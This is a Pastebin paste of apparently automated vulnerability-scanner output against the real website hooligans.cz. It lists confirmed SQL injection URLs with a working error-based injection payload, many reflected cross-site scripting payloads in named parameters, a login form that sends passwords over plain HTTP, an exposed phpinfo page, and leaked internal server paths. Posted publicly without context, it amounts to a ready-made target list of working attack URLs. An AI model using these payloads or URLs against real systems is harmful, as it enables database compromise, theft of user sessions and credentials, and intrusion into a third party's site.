Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- SQL Injection
- Severity: Critical
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))&stromhlmenu=44
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: rstema
- Parameter Type: Querystring
- Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- Severity: Critical
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: rstema
- Parameter Type: Querystring
- Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- [High Possibility] SQL Injection
- Severity: Critical
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema=%27&stromhlmenu=44
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: rstema
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity: Critical
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema=%27
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: rstema
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity: Critical
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema=44&stromhlmenu=%27
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: stromhlmenu
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity: Critical
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/?strana=%27
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: strana
- Parameter Type: Querystring
- Attack Pattern: %27
- Severity: Critical
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/index.php?strana=%27
- Vulnerability Classifications: PCI 6.5.2 OWASP A1 CAPEC-66 CWE-89 98
- Parameter Name: strana
- Parameter Type: Querystring
- Attack Pattern: %27
- ||| Password Transmitted Over HTTP
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/galerie/login.php?referer=index.php?cat=46
- Vulnerability Classifications: PCI 6.5.9 OWASP A9 CWE-311 319
- Form target action: login.php?referer=index.php%3Fcat%3D46
- ||| XSS (Cross-site Scripting)
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/view.php?cisloclanku='"--></style></script><script>alert(0x00141D)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: cisloclanku
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x00141D)</script>
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/search.php?rsvelikost="></script><script>alert(9)</script>&rstext=all-phpRS-all&rstema=44&stromhlmenu=44
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: rsvelikost
- Parameter Type: Querystring
- Attack Pattern: "></script><script>alert(9)</script>
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/comment.php?akce=view&cisloclanku=2012050015'"--></style></script><script>alert(0x001482)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: cisloclanku
- Parameter Type: Querystring
- Attack Pattern: 2012050015'"--></style></script><script>alert(0x001482)</script>
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/search.php?rsvelikost=sab&rstext='"--></style></script><script>alert(0x00149A)</script>&rstema=44&stromhlmenu=44
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: rstext
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x00149A)</script>
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema='"--></style></script><script>alert(0x0014B7)</script>&stromhlmenu=44
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: rstema
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0014B7)</script>
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/rservice.php?akce=info&cisloclanku='"--></style></script><script>alert(0x0014DB)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: cisloclanku
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0014DB)</script>
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema=44&stromhlmenu='"--></style></script><script>alert(0x0014D7)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: stromhlmenu
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x0014D7)</script>
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/search.php
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: rstext
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x0015A4)</script>
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/download.php?akce=detail&id_detail=8&sekce='"--></style></script><script>alert(0x00161F)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: sekce
- Parameter Type: Querystring
- Attack Pattern: '"--></style></script><script>alert(0x00161F)</script>
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema="><script>alert(9)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: rstema
- Parameter Type: Querystring
- Attack Pattern: "><script>alert(9)</script>
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/comment.php
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: cisloclanku
- Parameter Type: Post
- Attack Pattern: 2012050015'"--></style></script><script>alert(0x0016DD)</script>
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/rservice.php
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: cisloclanku
- Parameter Type: Post
- Attack Pattern: '"--></style></script><script>alert(0x001758)</script>
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/comment.php
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: cisloclanku
- Parameter Type: Post
- Attack Pattern: 2012050015'"--></style></script><script>alert(0x001797)</script>
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/download.php?akce=sekce&sekce=2'"--></style></script><script>alert(0x001A7A)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: sekce
- Parameter Type: Querystring
- Attack Pattern: 2'"--></style></script><script>alert(0x001A7A)</script>
- Severity: Important
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/ankety.php?akce=view&anketa=13'"--></style></script><script>alert(0x001AB5)</script>
- Vulnerability Classifications: PCI 6.5.1 OWASP A2 CAPEC-19 CWE-79 79
- Parameter Name: anketa
- Parameter Type: Querystring
- Attack Pattern: 13'"--></style></script><script>alert(0x001AB5)</script>
- ||| phpinfo() Information Disclosure
- Severity : Low
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/phpinfo.php
- Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
- ||| Database Error Message
- Severity: Low
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/index.php?strana=%27
- Vulnerability Classifications: PCI 6.5.6 OWASP A6 CAPEC-118 CWE-200 209
- Parameter Name: strana
- Parameter Type: Querystring
- Attack Pattern: %27
- ||| MySQL Database Identified
- Severity: Information
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/search.php?rsvelikost=sab&rstext=all-phpRS-all&rstema=(select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))&stromhlmenu=44
- Vulnerability Classifications: -
- Parameter Name: rstema
- Parameter Type: Querystring
- Attack Pattern: (select 1 and row(1,1)>(select count(*),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()*2))x from (select 1 union select 2)a group by x limit 1))
- ||| [Possible] Internal Path Leakage (*nix)
- Severity: Information
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/phpinfo.php
- Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
- Identified Internal Path(s):
- /usr/bin'
- /usr/sbin'
- /usr/share'
- /usr/include'
- /usr/lib64'
- /usr/libexec'
- /usr/com'
- /usr/share/man'
- /usr/share/info'
- /etc/php.d'
- /usr/share/file/magic.mime'
- /usr/sbin/apxs'
- /etc/php.ini
- /etc/php.d
- /etc/php.d/Fileinfo.ini,
- /etc/php.d/dbase.ini,
- /etc/php.d/dom.ini,
- /etc/php.d/gd.ini,
- /etc/php.d/imap.ini,
- /etc/php.d/ldap.ini,
- Severity: Information
- Confirmation: Confirmed
- Vulnerable URL: http://www.hooligans.cz/galerie/docs/
- Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
- Identified Internal Path(s):
- /usr/bin/X11/
- /etc/http/conf.d
- /var/my_images/
- Severity: Information
- Confirmation: Confirmed
- Vulnerable URL : http://www.hooligans.cz/galerie/docs/faq.htm
- Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
- Identified Internal Path(s):
- /tmp/phpezCYKr
- /tmp/#sql_45d5_0.MYI
- /etc/http/conf.d
- Severity: Information
- Confirmation: Confirmed
- Vulnerable URL : http://www.hooligans.cz/galerie/docs/index.htm
- Vulnerability Classifications: PCI 6.5.6 CAPEC-118 CWE-200 209
- Identified Internal Path(s):
- /usr/bin/X11/
- /etc/http/conf.d
- /var/my_images/
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement